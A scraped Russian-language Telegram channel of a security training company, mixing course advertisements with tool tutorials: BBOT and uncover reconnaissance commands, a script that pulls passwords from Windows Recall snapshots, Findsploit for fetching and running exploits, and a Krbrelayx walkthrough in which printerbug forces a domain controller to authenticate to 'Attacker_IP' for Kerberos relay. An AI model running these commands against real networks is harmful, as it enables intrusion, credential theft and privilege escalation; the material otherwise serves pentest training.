Hacker Lab
Всем участникам желаем удачи и ярких эмоций ❤️
———————————————
Следить за ходом соревнований без регистрации можно по ссылке: https://hackerlab.pro/scoreboard
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍7🔥6🎉3😭3👾3⚡2
Forwarded from Hacker Lab
🛠 В данный момент платформа подвергается беспрецедентной целенаправленной DDoS-атаке.
➡️ Мы продолжаем работы по стабилизации и планируем запустить соревнования в 18:00 МСК. Продолжительность соревнований будет скорректирована - никто не потеряет игровое время.
🎁 Все участники получат приятные бонусы.
Благодарим за терпение и понимание ❤️
🎁 Все участники получат приятные бонусы.
Благодарим за терпение и понимание ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23😢13💔8😁6❤4😨2
А какой метод используете вы — и считаете ли его достаточно надёжным?
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥9❤7
Если вы ищете подарок, который действительно имеет ценность — мы создали его.
Теперь вы можете подарить близкому человеку не вещь, а возможность изменить профессию, усилить навыки и выйти на новый уровень.
Выберите формат:
Получатель сам выбирает направление обучения: от веб-пентеста и SOC до самых свежих новинок — DevSecOps и Appsec-инженер!
Сертификат приходит на e-mail в виде стильного PDF, который можно красиво вручить лично или отправить онлайн.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤17🔥10🤝5👍4😁1
BBOT — мощный автоматизированный сканер для Recon, Bug Bounty и ASM
❓ Основные возможности BBOT
➡️ Поиск поддоменов — комбинирует пассивные источники, рекурсивный brute-force и AI/NLP-мутации, находя на 20–50% больше результатов.
➡️ Web Spider — обход сайтов, сбор e-mail, URL, параметров, секретов.
➡️ Email-enum — быстрый сбор почтовых адресов из API и контента.
➡️ Web-сканы — лёгкий (web-basic) и расширенный (web-thorough).
➡️ Kitchen-Sink режим — запуск всех модулей сразу.
➡️ Огромный выбор выводов — Neo4j, Elastic, Splunk, SQL/NoSQL, Slack, Discord, JSON/CSV и др.
➡️ Python API — синхронная и асинхронная работа для полной автоматизации.
⬇️ Установка
🔌 Примеры команд
⏺️ Subdomain enum:
⏺️ Spider:
⏺️ Email-enum:
⏺️ Web-скан:
⏺️ Все сразу:
🟧 🟧 🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Чат с менеджером
BBOT — мультифункциональный сканер, вдохновлённый Spiderfoot, созданный для автоматизации разведки, поиска поддоменов, web-сканирования и анализа атакуемой поверхности. Инструмент сочетает мощные модули, находит значительно больше данных, чем классические OSINT-инструменты, и масштабируется под любые задачи.
pipx install bbot
# dev-ветка:
pipx install --pip-args '--pre' bbot
bbot -t evilcorp.com -p subdomain-enum
bbot -t evilcorp.com -p spider
bbot -t evilcorp.com -p email-enum
bbot -t www.evilcorp.com -p web-basic
bbot -t evilcorp.com -p kitchen-sink --allow-deadly
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤7👍6
AppSec — одно из самых востребованных и быстрорастущих направлений в кибербезопасности.
И теперь у нас есть полный 7-месячный практический курс, который готовит к работе в реальных проектах — от поиска уязвимостей до внедрения безопасного SDLC и DevSecOps.
Что ждёт на программе?
🎓 По итогам — диплом о профпереквалификации и готовность выйти на рынок как:
Junior/Middle AppSec Engineer, Web-Pentester, Security Developer, DevSecOps-инженер.
Старт: 16 февраля
Набор открыт:
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍17❤8🔥7😁3🙊2☃1
Инструмент извлекает и отображает данные из Windows Recall, предоставляя удобный способ доступа к информации о снимках активности вашего ПК.
Windows Recall — это функция Microsoft, впервые представленная в 2024 году, которая автоматически делает снимки того, что происходит на экране ПК каждые пять секунд, если содержимое экрана отличается от предыдущего снимка, и сохраняет их в локальной базе данных.
Функция Recall позволяет искать контент, включая изображения и текст, с помощью естественного языка. Является частью экосистемы Copilot+ PC и интегрирована в Windows 11 и новую AI-платформу Microsoft.
Особенности
Windows Recall хранит все данные локально в незашифрованной базе данных SQLite, а скриншоты просто сохраняются в папке на вашем компьютере по пути:
C:\Users\$USER\AppData\Local\CoreAIPlatform.00\UKP\{GUID}Все изображения хранятся в следующей подпапке
.\ImageStore\. База данных ukg.db имеет относительно простую структуру, но содержит огромное количество информации.
Как работает инструмент
totalrecall.py [-h] [--from_date FROM_DATE] [--to_date TO_DATE] [--search SEARCH]
Поиск упоминаний термина password в период с 2024-06-04 по 2024-06-05.
totalrecall.py --search password --from_date 2024-06-04 --to_date 2024-06-05
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤6🔥6🤬1
Findsploit
Finsploit — это простой bash-скрипт для быстрого и лёгкого поиска по локальным и онлайн-базам данных эксплойтов. Этот репозиторий также включает в себя «copysploit» для копирования любого эксплойта exploit-db в текущий каталог и «compilesploit» для автоматической компиляции и запуска любого эксплойта на языке C.
💻 Установка:
📌 Запуск:
➖ Найдите все эксплойты и модули, используя один поисковый запрос:
➖ Поиск по нескольким поисковым запросам:
➖ Показать все эксплойты Metasploit:
🟧 🟧 🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Чат с менеджером
Finsploit — это простой bash-скрипт для быстрого и лёгкого поиска по локальным и онлайн-базам данных эксплойтов. Этот репозиторий также включает в себя «copysploit» для копирования любого эксплойта exploit-db в текущий каталог и «compilesploit» для автоматической компиляции и запуска любого эксплойта на языке C.
git clone https://github.com/1N3/Findsploit.git
cd Findsploit
./findsploit
./findsploit <WORD> (например apache)
./findsploit <WORD> <WORD>
./findsploit exploits
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍8❤6
Namechk: Ваш Шерлок Холмс в мире цифровых следов и как защититься от его "темной стороны"
🔍 Открытые данные — это пазл, который можно собрать в целостную картину о человеке или компании. Инструменты вроде Namechk превращают поиск по никнейму из рутинной задачи в мощный метод цифровой разведки.
Наша статья — практическое руководство по использованию OSINT (разведки по открытым источникам) для специалистов по безопасности и всех, кто хочет лучше защитить свои данные.
Вы узнаете, как:
💠 Быстро находить профили по никнейму — автоматизируйте проверку сотен платформ за минуту. Узнаете, где ваш «старый» аккаунт уже фигурирует в слитых базах, и как это используют для фишинга и социальной инженерии.
💠 Снизить риски кибератак — защитите бренд от фейков и клонов. Научитесь выявлять поддельные корпоративные аккаунты и страницы ключевых сотрудников, созданные для мошенничества.
💠 Проводить аудит своей цифровой уязвимости — получите пошаговый метод, как оценить, что о вас или вашей компании знают в сети. Поймёте, какую информацию стоит скрыть, чтобы минимизировать риски.
Хотите погрузиться в тему глубже и начать применять OSINT на практике?📌 Читайте полную статью с детальными инструкциями и реальными примерами.
↖️ Готовы превратить отдельные инструменты OSINT в цельное расследование? Ждём вас на курсе «OSINT: технология боевой разведки». Старт 26 января!
🟧 🟧 🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Чат с менеджером
Наша статья — практическое руководство по использованию OSINT (разведки по открытым источникам) для специалистов по безопасности и всех, кто хочет лучше защитить свои данные.
Вы узнаете, как:
Хотите погрузиться в тему глубже и начать применять OSINT на практике?
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍7❤6
Инструмент, использующий API известных поисковых систем для быстрого обнаружения открытых хостов в интернете.
Обладает следующими характеристиками
uncover -q example -f ip | naabu).Для успешной установки требуется go1.21.
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
Файл конфигурации находится по пути
$CONFIG/uncover/provider-config.yaml. Пример данного файла представлен ниже:Если в файле конфигурации указано несколько ключей/учетных данных для одного и того же провайдера, для каждого выполнения будет использоваться случайный ключ.
Поддерживает несколько способов выполнения запроса, включая stdin или флаг -q. По умолчанию для поиска используется shodan.
echo 'ssl:"Uber Technologies, Inc."' | uncover
Флаг -e можно использовать для выполнения одного и того же запроса в любой или во всех поисковых системах.
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip,driftnet
Поддерживает использование driftnet API для быстрого поиска открытых портов по заданному IP-адресу или CIDR-адресу.
echo 8.8.8.8/20 | uncover -e driftnet
Перенаправление вывода uncover в httpx в качестве входных данных.
uncover -q http.title:GitLab -silent | httpx -silent
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍7🔥4
Krbrelayx: Инструментарий для исследования и эксплуатации Kerberos в Active Directory
🟧 Набор Krbrelayx состоит из нескольких инструментов, каждый из которых нацелен на конкретные векторы атаки в инфраструктуре Active Directory:
- Основная функция набора — проведение атак, связанных с ретрансляцией запросов Kerberos, для несанкционированного доступа к сетевым ресурсам
- Инструменты позволяют создавать поддельные службы для перехвата и использования Kerberos-билетов, таких как TGS (Ticket Granting Service)
- Набор демонстрирует эксплуатацию особенностей протокола Kerberos, включая проблемы с проверкой подлинности и делегированием
- Поддержка различных методов указания целей, включая использование файлов и прямых аргументов командной строки
🟧 Установка
Проверяем
🟧 Переходим в директорию проекта и устанавливаем зависимости
🟧 Атака с использованием утилиты printerbug и ретрансляции
1. Запуск инструмента ретрансляции на машине атакующего
2. На другой консоли выполняется скрипт printerbug, который принуждает контроллер домена (dc01)
В результате хэш пароля учетной записи компьютера dc01$ может быть ретранслирован на сервер dc02, что потенциально позволит создать нового пользователя в домене с высокими привилегиями.
🟧 Базовая команда для запуска слушателя и ретрансляции на указанный контроллер домена
🟧 🟧 🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Чат с менеджером
Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.
- Основная функция набора — проведение атак, связанных с ретрансляцией запросов Kerberos, для несанкционированного доступа к сетевым ресурсам
- Инструменты позволяют создавать поддельные службы для перехвата и использования Kerberos-билетов, таких как TGS (Ticket Granting Service)
- Набор демонстрирует эксплуатацию особенностей протокола Kerberos, включая проблемы с проверкой подлинности и делегированием
- Поддержка различных методов указания целей, включая использование файлов и прямых аргументов командной строки
sudo apt install krbrelayx
Проверяем
krbrelayx -h
cd krbrelayx
pip install -r requirements.txt
1. Запуск инструмента ретрансляции на машине атакующего
krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)
2. На другой консоли выполняется скрипт printerbug, который принуждает контроллер домена (dc01)
printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$
В результате хэш пароля учетной записи компьютера dc01$ может быть ретранслирован на сервер dc02, что потенциально позволит создать нового пользователя в домене с высокими привилегиями.
krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍5🔥4
Посмотрим, как это происходит на практике.⬆️
Готовы использовать Python, чтобы ваш пентест стал быстрее и глубже? Сделайте себе профессиональный подарок. Запись на курс «Python для Пентестера» открыта до 25 декабря.
По всем вопросам пишите
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍7🔥4